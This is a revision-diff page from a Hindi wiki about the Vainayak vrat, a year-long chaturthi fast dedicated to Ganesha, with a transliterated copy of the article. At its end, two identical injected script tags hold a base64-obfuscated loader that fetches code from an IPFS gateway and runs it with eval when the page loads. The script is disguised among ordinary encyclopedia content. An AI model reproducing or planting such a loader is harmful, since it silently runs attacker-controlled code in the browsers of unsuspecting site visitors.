Difference between revisions of "वैनायक व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*प्रत्येक [[चतुर्थी]] पर एक वर्ष तक नक्तविधि वैनायक व्रत करना चाहिए।
 
*प्रत्येक [[चतुर्थी]] पर एक वर्ष तक नक्तविधि वैनायक व्रत करना चाहिए।
*अन्त में एक [[गज]] का दान करना चाहिए।
+
*अन्त में एक गज का दान करना चाहिए।
 
*वैनायक व्रत तिथिव्रत; देवता [[गणेश]] हैं।
 
*वैनायक व्रत तिथिव्रत; देवता [[गणेश]] हैं।
 
*ऐसी मान्यता है कि वैनायक व्रत से [[शिवलोक]] की प्राप्ति होती है।<ref>कृत्यकल्पतरु (व्रत, 448, [[मत्स्य पुराण]] 101|61 का उद्धरण); हेमाद्रि (व्रत खण्ड 1, 532, [[पद्म पुराण]] से उद्धरण)</ref>
 
*ऐसी मान्यता है कि वैनायक व्रत से [[शिवलोक]] की प्राप्ति होती है।<ref>कृत्यकल्पतरु (व्रत, 448, [[मत्स्य पुराण]] 101|61 का उद्धरण); हेमाद्रि (व्रत खण्ड 1, 532, [[पद्म पुराण]] से उद्धरण)</ref>

Revision as of 11:01, 11 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • pratyek chaturthi par ek varsh tak naktavidhi vainayak vrat karana chahie.
  • ant mean ek gaj ka dan karana chahie.
  • vainayak vrat tithivrat; devata ganesh haian.
  • aisi manyata hai ki vainayak vrat se shivalok ki prapti hoti hai.[1]

tika tippani aur sandarbh

  1. krityakalpataru (vrat, 448, matsy puran 101|61 ka uddharan); hemadri (vrat khand 1, 532, padm puran se uddharan)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>